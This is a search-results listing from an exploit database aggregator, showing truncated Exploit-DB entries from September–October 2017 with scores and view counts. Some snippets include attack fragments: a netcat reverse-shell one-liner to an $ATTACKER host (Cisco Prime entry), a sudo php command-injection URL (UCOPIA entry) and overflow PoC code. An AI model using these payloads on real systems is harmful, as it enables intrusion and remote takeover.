Lucene search
+L
ExploitdbRecent

47904 matches found

exploitdb
exploitdb
added 2017/10/02 12:0 a.m.101 views

Linux Kernel < 4.14.rc3 - Local Denial of Service

/ Exploit Title: Linux Kernelnrfrags was overwritten by ev-iferror = err 0xff in the condition where nlh-nlmsglen==0x10 and skb-len nlh-nlmsglen. POC: / include include include include include define NETLINKUSER 31 define MAXPAYLOAD 1024 / maximum payload size/ struct sockaddrnl srcaddr, destaddr...

5.5CVSS6.9AI score0.01155EPSS
Exploits4
exploitdb
exploitdb
added 2017/10/02 12:0 a.m.196 views

Qmail SMTP - Bash Environment Variable Injection (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Qmail SMTP Bash Environment Variable Injection Shellshock', 'Description' = %q This module exploits a shellshock vulnerability on Qmail, a public...

10CVSS7.4AI score0.99999EPSS
Exploits132
exploitdb
exploitdb
added 2017/10/02 12:0 a.m.56 views

OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'jobRunId' SQL Injection

Title: OpenText Document Sciences xPression formerly EMC Document Sciences xPression - SQL Injection Author: Marcin Woloszyn Date: 27. September 2017 CVE: CVE-2017-14757 Affected Software: ================== OpenText Document Sciences xPression formerly EMC Document Sciences xPression Exploit was...

8.8CVSS8.8AI score0.01895EPSS
Exploits6
exploitdb
exploitdb
added 2017/10/02 12:0 a.m.44 views

phpCollab 2.5.1 - SQL Injection

CVE-2017-6089 PhpCollab 2.5.1 Multiple SQL Injections unauthenticated Description PhpCollab is an open source web-based project management system, that enables collaboration across the Internet. SQL injections The phpCollab code does not correctly filter arguments, allowing arbitrary SQL code...

9.8CVSS7AI score0.02953EPSS
Exploits5
exploitdb
exploitdb
added 2017/10/02 12:0 a.m.83 views

phpCollab 2.5.1 - Arbitrary File Upload

CVE-2017-6090 PhpCollab 2.5.1 Arbitrary File Upload unauthenticated Description PhpCollab is an open source web-based project management system, that enables collaboration across the Internet. Arbitrary File Upload The phpCollab code does not correctly filter uploaded file contents. An...

8.8CVSS8.7AI score0.96068EPSS
Exploits9
exploitdb
exploitdb
added 2017/10/02 12:0 a.m.50 views

NPM-V (Network Power Manager) 2.4.1 - Password Reset

NPM-VNetwork Power Manager = 2.4.1 Reset Password Vulnerability Author: Saeed reza Zamanian penetrationtest @ Linkedin Product: NPM-V Affected Version : 2.4.1 and below Vendor : http://www.china-clever.com Product Link : http://www.china-clever.com/en/index.php/product?view=products&cid=125 Date:...

7.4AI score
Exploits0
exploitdb
exploitdb
added 2017/10/02 12:0 a.m.331 views

Dnsmasq < 2.78 - Lack of free() Denial of Service

''' Sources: https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14495.py https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html dnsmasq is vulnerable only if one of the following option is specified: --add-mac,...

7.5CVSS8.9AI score0.84323EPSS
Exploits5
exploitdb
exploitdb
added 2017/10/02 12:0 a.m.1846 views

Dnsmasq < 2.78 - Stack Overflow

''' Sources: https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14493.py https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html 1 Build the docker and open two terminals docker build -t dnsmasq . docker run --rm -t -i...

9.8CVSS9AI score0.83638EPSS
Exploits6
exploitdb
exploitdb
added 2017/10/02 12:0 a.m.144 views

UCOPIA Wireless Appliance < 5.1 (Captive Portal) - Root Remote Code Execution

Exploit Title: Unauthenticated remote root code execution on captive portal Ucopia '/var/www/html/upload/bd.php;echo%20t As php is in sudoers without password... https://controller.access.network/upload/bd.php?0=sudo%20/usr/bin/php%20-r%20%27system"id";%27 Just push your ssh key and get nice root...

7.4AI score
Exploits0
exploitdb
exploitdb
added 2017/10/02 12:0 a.m.762 views

Dnsmasq < 2.78 - Integer Underflow

''' Sources: https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14496.py https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html dnsmasq is vulnerable only if one of the following option is specified: --add-mac,...

7.8CVSS8.9AI score0.66347EPSS
Exploits5
exploitdb
exploitdb
added 2017/10/02 12:0 a.m.454 views

Dnsmasq < 2.78 - Information Leak

''' Sources: https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14494.py https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html Sadly, there are no easy docker setup instructions available. Setup a simple network with...

5.9CVSS9.3AI score0.67549EPSS
Exploits5
exploitdb
exploitdb
added 2017/10/02 12:0 a.m.70 views

OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'documentId' SQL Injection

Title: OpenText Document Sciences xPression formerly EMC Document Sciences xPression - SQL Injection Author: Marcin Woloszyn Date: 27. September 2017 CVE: CVE-2017-14758 Affected Software: ================== OpenText Document Sciences xPression formerly EMC Document Sciences xPression Exploit was...

8.8CVSS8.8AI score0.02672EPSS
Exploits6
exploitdb
exploitdb
added 2017/09/30 12:0 a.m.152 views

Sync Breeze Enterprise 10.0.28 - Remote Buffer Overflow

Exploit Title: SyncBreeze POST username overflow Date: 30-Sep-2017 Exploit Author: Owais Mehtab Vendor Homepage: http://www.syncbreeze.com Software Link: http://www.syncbreeze.com/setups/syncbreezeentsetupv10.0.28.exe Version: 10.0.28 Tested on: Windows 7 !/usr/bin/python import socket import os...

7AI score
Exploits0
exploitdb
exploitdb
added 2017/09/30 12:0 a.m.30 views

Microsoft Word 2007 (x86) - Information Disclosure

Title: MS Office Word Information Disclosure Vulnerability Date: September 30th, 2017. Author: Eduardo Braun Prado Vendor Homepage: http://www.microsoft.com/ Software Link: https://products.office.com/ Version: 2007 32-bits x86 Tested on: Windows 8/7/Server 2008/Vista/Server 2003/XP X86 and x64...

7.4AI score
Exploits0
exploitdb
exploitdb
added 2017/09/30 12:0 a.m.623 views

Microsoft Excel - OLE Arbitrary Code Execution

Title: MS Office Excel all versions Arbitrary Code Execution Vulnerability Date: September 30th, 2017. Author: Eduardo Braun Prado Vendor Homepage: http://www.microsoft.com/ Software Link: https://products.office.com/ Version: 2007,2010,2013,2016 32/64 bits x86 and x64 Tested on: Windows...

7.4AI score
Exploits0
exploitdb
exploitdb
added 2017/09/29 12:0 a.m.24 views

ConverTo Video Downloader & Converter 1.4.1 - Arbitrary File Download

Exploit Title: ConverTo Video Downloader & Converter 1.4.1 - Arbitrary File Download Dork: N/A Date: 29.09.2017 Vendor Homepage: https://codecanyon.net/user/lemonadeflirt Software Link: https://codecanyon.net/item/converto-video-downloader-converter/13225966 Demo: http://vd.googglet.com/ Version:...

7.4AI score
Exploits0
exploitdb
exploitdb
added 2017/09/29 12:0 a.m.55 views

FileRun < 2017.09.18 - SQL Injection

!/usr/bin/env python Exploit Title: FileRun =2017.09.18 Date: September 29, 2017 Exploit Author: SPARC Vendor Homepage: https://www.filerun.com/ Software Link: http://f.afian.se/wl/?id=EHQhXhXLGaMFU7jI8mYNRN8vWkG9LUVP&recipient=d3d3LmZpbGVydW4uY29t Version: 2017.09.18 Tested on: Ubuntu 16.04.3,...

9.8CVSS9.7AI score0.02624EPSS
Exploits5
exploitdb
exploitdb
added 2017/09/29 12:0 a.m.50 views

WordPress Plugin WPHRM - SQL Injection

Exploit Title: WordPress Plugin WPHRM - SQL Injection Dork: N/A Date: 29.09.2017 Vendor Homepage: http://mojoomla.com/ Software Link: https://codecanyon.net/item/wphrm-human-resource-management-system-for-wordpress/20555857 Demo: http://mobilewebs.net/mojoomla/extend/wordpress/wphrm/ Version: N/A...

8.8CVSS8.8AI score0.03029EPSS
Exploits5
exploitdb
exploitdb
added 2017/09/29 12:0 a.m.33 views

Dup Scout Enterprise 10.0.18 - 'Import Command' Local Buffer Overflow

!/usr/bin/python ======================================================================================================================== Exploit Author: Touhid M.Shaikh Exploit Title: Dup Scout Enterprise v10.0.18 "Import Command" Buffer Overflow Date: 29-09-2017 Website: www.touhidshaikh.com...

7.4AI score
Exploits0
exploitdb
exploitdb
added 2017/09/29 12:0 a.m.76 views

Trend Micro OfficeScan 11.0/XG (12.0) - Memory Corruption

Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14089-TRENDMICRO-OFFICESCAN-XG-PRE-AUTH-REMOTE-MEMORY-CORRUPTION.txt + ISR: ApparitionSec Vendor: ================== www.trendmicro.com Product: ======== OfficeScan...

9.8CVSS9.6AI score0.09779EPSS
Exploits5
exploitdb
exploitdb
added 2017/09/28 12:0 a.m.25 views

Real Estate MLM plan script 1.0 - 'srch' SQL Injection

Exploit Title: Real Estate MLM plan script v1.0 - 'srch' Parameter SQL Injection Date: 2017-09-28 Exploit Author: 8bitsec Vendor Homepage: http://www.mlmscript.in/ Software Link: http://www.mlmscript.in/real-estate-mlm-script.html Version: 1.0 Tested on: Kali Linux 2.0 | Mac OS 10.12.6 Email:...

7.4AI score
Exploits0
exploitdb
exploitdb
added 2017/09/28 12:0 a.m.25 views

PHP Multi Vendor Script 1.02 - 'sid' SQL Injection

Exploit Title: PHP Multi Vendor Script v1.02 - 'sid' Parameter SQL Injection Date: 2017-09-28 Exploit Author: 8bitsec Vendor Homepage: http://www.dexteritysolution.com/ Software Link: http://www.dexteritysolution.com/php-multivendor-e-commerce-script.html Version: 1.02 Tested on: Kali Linux 2.0 |...

7.4AI score
Exploits0
exploitdb
exploitdb
added 2017/09/28 12:0 a.m.54 views

Trend Micro OfficeScan 11.0/XG (12.0) - 'Host' Header Injection

Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14087-TRENDMICRO-OFFICESCAN-XG-HOST-HEADER-INJECTION.txt + ISR: ApparitionSec Vendor: ================== www.trendmicro.com Product: ======== OfficeScan v11.0 and XG...

7.5CVSS7.7AI score0.08328EPSS
Exploits5
exploitdb
exploitdb
added 2017/09/28 12:0 a.m.25 views

DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow

!/usr/bin/python ======================================================================================================================== Exploit Author: Touhid M.Shaikh Exploit Title: DiskBoss Enterprise v8.4.16 "Import Command" Buffer Overflow Date: 29-09-2017 Website: www.touhidshaikh.com...

7AI score
Exploits0
exploitdb
exploitdb
added 2017/09/28 12:0 a.m.46 views

Roteador Wireless Intelbras WRN150 - Autentication Bypass

Exploit Title: Autentication Bypass/Config file download - INTELBRAS WRN 150 Date: 28/09/2017 Exploit Author: Elber Tavares Vendor Homepage: http://intelbras.com.br/ Version: Intelbras Wireless N 150 Mbps - WRN 150 Tested on: kali linux, windows 7, 8.1, 10 For more info:...

7.4AI score
Exploits0
exploitdb
exploitdb
added 2017/09/28 12:0 a.m.23 views

DiskBoss Enterprise 8.4.16 - Local Buffer Overflow (PoC)

!/usr/bin/python ======================================================================================================================== Exploit Author: Touhid M.Shaikh Exploit Title: DiskBoss Enterprise v8.4.16 Local Buffer OverflowPoC Date: 28-09-2017 Website: www.touhidshaikh.com Vulnerable...

7.4AI score
Exploits0
exploitdb
exploitdb
added 2017/09/28 12:0 a.m.25 views

Easy Blog PHP Script 1.3a - 'id' SQL Injection

Exploit Title: Easy Blog PHP Script v1.3a - SQL Injection Date: 2017-09-27 Exploit Author: 8bitsec Vendor Homepage: https://www.codester.com/ Software Link: https://www.codester.com/items/4616/easy-blog-php-script Version: 1.3a Tested on: Kali Linux 2.0 | Mac OS 10.12.6 Email: [email protected]...

7.4AI score
Exploits0
exploitdb
exploitdb
added 2017/09/28 12:0 a.m.60 views

Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure

Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14083-TRENDMICRO-OFFICESCAN-XG-PRE-AUTH-REMOTE-ENCRYPTION-KEY-DISCLOSURE.txt + ISR: ApparitionSec Vendor: ================== www.trendmicro.com Product: ========...

7.5CVSS7.7AI score0.05503EPSS
Exploits7
exploitdb
exploitdb
added 2017/09/28 12:0 a.m.55 views

Trend Micro OfficeScan 11.0/XG (12.0) - Man In The Middle Remote Code Execution

Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14084-TRENDMICRO-OFFICESCAN-XG-CURL-MITM-REMOTE-CODE-EXECUTION.txt + ISR: ApparitionSec Vendor: ================== www.trendmicro.com Product: ======== OfficeScan...

8.1CVSS8.2AI score0.10128EPSS
Exploits3
exploitdb
exploitdb
added 2017/09/28 12:0 a.m.43 views

Trend Micro OfficeScan 11.0/XG (12.0) - Server Side Request Forgery

Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/TRENDMICRO-OFFICESCAN-XG-SERVER-SIDE-REQUEST-FORGERY.txt + ISR: ApparitionSec Vendor: ================== www.trendmicro.com Product: =========== OfficeScan v11.0 and XG 12.0...

7.4AI score
Exploits0
exploitdb
exploitdb
added 2017/09/28 12:0 a.m.47 views

Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass

Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/TRENDMICRO-OFFICESCAN-XG-IMAGE-FILE-EXECUTION-BYPASS.txt + ISR: ApparitionSec Vendor: ================== www.trendmicro.com Product: ======== OfficeScan v11.0 and XG 12.0...

7.4AI score
Exploits0
exploitdb
exploitdb
added 2017/09/28 12:0 a.m.68 views

Trend Micro OfficeScan 11.0/XG (12.0) - Information Disclosure

Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14085-TRENDMICRO-OFFICESCAN-XG-REMOTE-NT-DOMAIN-PHP-INFO-DISCLOSURE.txt + ISR: ApparitionSec Vendor: ================== www.trendmicro.com Product: ===========...

5.3CVSS5.8AI score0.05651EPSS
Exploits4
exploitdb
exploitdb
added 2017/09/28 12:0 a.m.63 views

Trend Micro OfficeScan 11.0/XG (12.0) - Code Execution / Memory Corruption

Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/CVE-2017-14086-TRENDMICRO-OFFICESCAN-XG-PRE-AUTH-START-REMOTE-PROCESS-CODE-EXECUTION-MEM-CORRUPT.txt + ISR: ApparitionSec Vendor: ================== www.trendmicro.com...

7.8CVSS7.7AI score0.07906EPSS
Exploits5
exploitdb
exploitdb
added 2017/09/28 12:0 a.m.32 views

Microsoft Office Groove - 'Workspace Shortcut' Arbitrary Code Execution

Title: MS Office Groove 'Workspace Shortcut' Arbitrary Code Execution Vulnerability Date: September 28th, 2017. Author: Eduardo Braun Prado Vendor Homepage: http://www.microsoft.com/ Software Link: https://products.office.com/ Version: 2007 32-bits x86 Tested on: Windows 7/Server 2008/Vista/Serve...

7AI score
Exploits0
exploitdb
exploitdb
added 2017/09/27 12:0 a.m.1882 views

Oracle WebLogic Server 10.3.6.0 - Java Deserialization Remote Code Execution

Exploit Title: Oracle WebLogic Server Java Deserialization Remote Code Execution Date: 27/09/2017 Exploit Author: SlidingWindow , Twitter: @kapilkhot Vulnerability Author: FoxGloveSecurity Vendor Homepage: http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html Affetcted Version...

9.8CVSS8.7AI score0.96032EPSS
Exploits17
exploitdb
exploitdb
added 2017/09/27 12:0 a.m.53 views

LAquis SCADA 4.1.0.2385 - Directory Traversal (Metasploit)

require 'msf/core' class MetasploitModule 'LAquis SCADA Web Server Directory Traversal Information Disclosure', 'Description' = %q This module exploits a directory traversal vulnerability found in the LAquis SCADA application. The vulnerability is triggered when sending a series of dot dot slashe...

5.3CVSS7.4AI score0.08733EPSS
Exploits4
exploitdb
exploitdb
added 2017/09/27 12:0 a.m.83 views

Sync Breeze Enterprise 10.0.28 - Denial of-Service (PoC)

!/usr/bin/python import socket import sys try: server = sys.argv1 port = 80 size = 800 inputBuffer = b"A" size content = b"username=" + inputBuffer + b"&password=A" buffer = b"POST /login HTTP/1.1\r\n" buffer += b"Host: " + server.encode + b"\r\n" buffer += b"User-Agent: Mozilla/5.0 X11; Linux866...

7.4AI score
Exploits0
exploitdb
exploitdb
added 2017/09/27 12:0 a.m.1145 views

SmarterStats 11.3.6347 - Cross-Site Scripting

---------------------------- Title: CVE-2017-14620 ---------------------------- TL;DR: SmarterStats Version 11.3.6347, and possibly prior versions, will Render the Referer Field of HTTP Logfiles in URL /Data/Reports/ReferringURLsWithQueries ---------------------------- Author: David Hoyt Date:...

6.1CVSS6.3AI score0.02466EPSS
Exploits5
exploitdb
exploitdb
added 2017/09/27 12:0 a.m.47 views

Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution

Exploit Title: Cisco Prime Collaboration Provisioning function encode echo "$1" | perl -MURI::Escape -ne 'chomp;print uriescape$,"\n"' TARGET=$1 ATTACKER=$2 PORT=$3 BASH=$encode "/bin/bash" COMMAND=$encode "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&1|nc $ATTACKER $PORT /tmp/f"...

7.4AI score
Exploits0
exploitdb
exploitdb
added 2017/09/27 12:0 a.m.24 views

Netgear ReadyNAS Surveillance 1.4.3-16 - Remote Command Execution

Exploit Netgear ReadyNAS Surveillance 1.4.3-16 Unauthenticated RCE Date: 27.09.2017 Software Link: https://www.netgear.com/ Exploit Author: Kacper Szurek Contact: https://twitter.com/KacperSzurek Website: https://security.szurek.pl/ Category: remote 1. Description $GET'uploaddir' is not escaped a...

7.4AI score
Exploits0
exploitdb
exploitdb
added 2017/09/26 12:0 a.m.32 views

WordPress Plugin School Management System - SQL Injection

Exploit Title: School Management System for Wordpress - SQL Injection Dork: N/A Date: 26.09.2017 Vendor Homepage: http://mojoomla.com/ Software Link: https://codecanyon.net/item/school-management-system-for-wordpress/11470032 Demo: http://www.mobilewebs.net/mojoomla/extend/wordpress/school/...

7.4AI score
Exploits0
exploitdb
exploitdb
added 2017/09/26 12:0 a.m.37 views

AMC Master - Arbitrary File Upload

Exploit Title: Annual Maintenance Contract Management System - Arbitrary File Upload Dork: N/A Date: 26.09.2017 Vendor Homepage: http://mojoomla.com/ Software Link: https://codecanyon.net/item/amc-master-annual-maintenance-contract-management-system/20667703 Demo:...

7.4AI score
Exploits0
exploitdb
exploitdb
added 2017/09/26 12:0 a.m.26 views

TicketPlus - Arbitrary File Upload

Exploit Title: TicketPlus - Support Ticket Management System - Arbitrary File Upload Dork: N/A Date: 26.09.2017 Vendor Homepage: http://teamworktec.com/ Software Link: https://codecanyon.net/item/ticketplus-support-ticket-management-system/20221316 Demo: http://sportsgrand.com/demo/ticketplus/...

7.4AI score
Exploits0
exploitdb
exploitdb
added 2017/09/26 12:0 a.m.29 views

SMSmaster - SQL Injection

Exploit Title: SMSmaster – Multipurpose SMS Gateway for Wordpress - SQL Injection Dork: N/A Date: 26.09.2017 Vendor Homepage: http://mojoomla.com/ Software Link: https://codecanyon.net/item/smsmaster-multipurpose-sms-gateway-for-wordpress/20605853 Demo:...

7.4AI score
Exploits0
exploitdb
exploitdb
added 2017/09/26 12:0 a.m.30 views

WordPress Plugin WPCHURCH - SQL Injection

Exploit Title: WPCHURCH - Church Management System for Wordpress - SQL Injection Dork: N/A Date: 26.09.2017 Vendor Homepage: http://mojoomla.com/ Software Link: https://codecanyon.net/item/wpchurch-church-management-system-for-wordpress/14292251 Demo:...

7.4AI score
Exploits0
exploitdb
exploitdb
added 2017/09/26 12:0 a.m.34 views

Photo Fusion - Arbitrary File Upload

Exploit Title: Photo Fusion - Free Stock Photos Script - Arbitrary File Upload Dork: N/A Date: 26.09.2017 Vendor Homepage: http://teamworktec.com/ Software Link: https://codecanyon.net/item/photo-fusion-free-stock-photos-script/20115244 Demo: http://teamworktec.com/demo/photos-fusion/ Version: N/...

7.4AI score
Exploits0
exploitdb
exploitdb
added 2017/09/26 12:0 a.m.29 views

Job Links - Arbitrary File Upload

Exploit Title: Job Links - Complete Job Management Script - Arbitrary File Upload Dork: N/A Date: 26.09.2017 Vendor Homepage: http://teamworktec.com/ Software Link: https://codecanyon.net/item/job-links-complete-job-management-script/20672089 Demo: http://teamworktec.com/demo/job-links/ Version:...

7AI score
Exploits0
exploitdb
exploitdb
added 2017/09/26 12:0 a.m.55 views

WordPress Plugin WPAMS - SQL Injection

Exploit Title: WPAMS - Apartment Management System for wordpress - SQL Injection Dork: N/A Date: 26.09.2017 Vendor Homepage: http://mojoomla.com/ Software Link: https://codecanyon.net/item/wpams-apartment-management-system-for-wordpress/15946837 Demo:...

7.4AI score
Exploits0
exploitdb
exploitdb
added 2017/09/26 12:0 a.m.380 views

Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation

/ CVE-2017-1000253.c - an exploit for CentOS-7 kernel versions 3.10.0-514.21.2.el7.x8664 and 3.10.0-514.26.1.el7.x8664 Copyright C 2017 Qualys, Inc. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free...

7.8CVSS7.9AI score0.10695EPSS
Exploits5
exploitdb
exploitdb
added 2017/09/26 12:0 a.m.31 views

WordPress Plugin WPGYM - SQL Injection

Exploit Title: WPGYM - Wordpress Gym Management System - SQL Injection Dork: N/A Date: 26.09.2017 Vendor Homepage: http://mojoomla.com/ Software Link: https://codecanyon.net/item/-wpgym-wordpress-gym-management-system/13352964 Demo: http://www.mobilewebs.net/mojoomla/extend/wordpress/gym/ Version...

7.4AI score
Exploits0
Total number of security vulnerabilities47904